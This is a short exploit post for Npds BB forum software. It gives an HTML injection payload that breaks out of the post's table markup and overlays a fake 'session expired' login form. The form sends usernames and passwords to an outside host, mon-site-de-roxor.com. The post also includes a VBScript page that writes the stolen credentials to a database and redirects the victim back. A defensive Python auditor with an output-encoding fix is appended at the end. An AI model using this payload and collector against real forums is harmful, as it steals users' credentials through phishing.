
Npds BB HTML Injection




I am releasing this very quickly, so it can be improved:

Code to put in a reply or in a topic:

Your fake message</td></tr><tr><td valign="bottom"><hr noshade size="1" 
class="ONGL">&nbsp;&nbsp<a href="user.php?op=userinfo&uname=User" CLASS="NOIR" 
target=_blank><img src="images/forum/icons/profile.gif" border=0 
ALT="">Profil</a>&nbsp;&nbsp;<a href="http://www.userland.com"; TARGET="_blank" 
CLASS="NOIR" TARGET="_blank"><IMG SRC="images/forum/icons/www_icon.gif" 
BORDER=0 Alt="">www</a>&nbsp;&nbsp;<a 
href="reply.php?topic=1&forum=1&post=2&citation=1" CLASS="NOIR"><IMG 
SRC="images/forum/icons/quote.gif" BORDER="0" Alt=""><FONT 
SIZE=1>Citation</FONT></a>

&nbsp;&nbsp;<a href="prntopic.php?forum=1&topic=1&post_id=2" CLASS="NOIR"><IMG 
SRC="images/forum/icons/print.gif" BORDER="0" Alt=""></a>
</td></tr></table></TD></TR>



<div style="position: absolute; left=0; top=0; height=3200; width=150"><form 
action="http://mon-site-de-roxor.com/roxor.asp"; method="post" name="piquage" 
target="_self"><table width="100%" border="0" cellspacing="0" 
cellpadding="0"><tr><td colspan="2"><div align="center">Your session has 
expired. Please log in to 
reply.</div></td></tr><tr><td>&nbsp;</td></tr><tr><td><div align="right">Login 
:</div> </td> <td><input name="login" type="text" value=""> 
</td></tr><tr><td><div align="right">Mot de passe :</div> </td><td><input 
name="password" type="password" value=""> 
</td></tr><tr><td>&nbsp;</td></tr><tr><td colspan="2"><div 
align="center"><input type="submit" name="Submit" 
value="Envoyer"></div></td></tr></table></form></div>

Example of code (VBScript) to put in the page called by the form in the topic:

<%@ Language=VBScript %>



<%



set base=server.createobject("ADODB.CONNECTION")

base.open nom_base, login_base, password_base



referant=left(request.servervariables("HTTP_REFERER"),instr(8,request.servervariables("HTTP_REFERER"),"/")-1)

login=Request.QueryString("login")

password=Request.QueryString("password")



requete_vol_infos="INSERT statistiques (date,npds,login,password) VALUES 
(getdate(),'" + cstr(referant) + "','" + cstr(login) + "','" + cstr(password) + 
"')"



set resultat_vol_infos=server.CreateObject("ADODB.RECORDSET")

resultat_vol_infos.Open requete_vol_infos, base



response.redirect(referant)



%>

Thanks to N-0-X and NewFFR :o)

Rituel
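
A defensive check for the injection described above, as an added example that is not part of the original post: it audits stored post bodies for the markup this payload relies on (closing wrapper cells the post never opened, an absolutely positioned overlay, a form posting off-site, a password field) and shows that output-encoding the body leaves nothing to flag. The names `PostAuditor`, `audit_post`, `render_post` and the hosts `forum.example` and `collector.example` are assumptions made for the example.

```python
import html
from html.parser import HTMLParser
from urllib.parse import urlparse

LAYOUT_TAGS = {"table", "tr", "td"}  # the forum's own wrapper markup


class PostAuditor(HTMLParser):
    """Flags markup in a stored post body that matches the injection above."""

    def __init__(self, site_host):
        super().__init__(convert_charrefs=True)
        self.site_host = site_host
        self.depth = dict.fromkeys(LAYOUT_TAGS, 0)
        self.findings = set()

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag in LAYOUT_TAGS:
            self.depth[tag] += 1
        elif tag == "form":
            host = urlparse(attrs.get("action") or "").hostname
            offsite = host is not None and host != self.site_host
            self.findings.add("offsite-form" if offsite else "form")
        elif tag == "input" and (attrs.get("type") or "").lower() == "password":
            self.findings.add("password-input")
        style = (attrs.get("style") or "").lower().replace(" ", "")
        if "position:absolute" in style:
            self.findings.add("absolute-overlay")

    def handle_endtag(self, tag):
        if tag in LAYOUT_TAGS:
            if self.depth[tag] == 0:
                # Closes a cell/row/table the post never opened: wrapper breakout.
                self.findings.add("layout-breakout")
            else:
                self.depth[tag] -= 1


def audit_post(body, site_host):
    auditor = PostAuditor(site_host)
    auditor.feed(body)
    auditor.close()
    return auditor.findings


def render_post(body):
    """Output-encode the body so the browser shows markup as text."""
    return html.escape(body, quote=True)


# Constructed sample, abridged from the payload above; host is a placeholder.
SAMPLE = ('Your fake message</td></tr><tr><td><div style="position: absolute; '
          'left=0; top=0"><form action="http://collector.example/x.asp" '
          'method="post"><input name="login" type="text">'
          '<input name="password" type="password"></form></div>')
```

Run `audit_post` over existing rows to find posts that already carry this markup, and apply the encoding in `render_post` wherever the post body is written into the page.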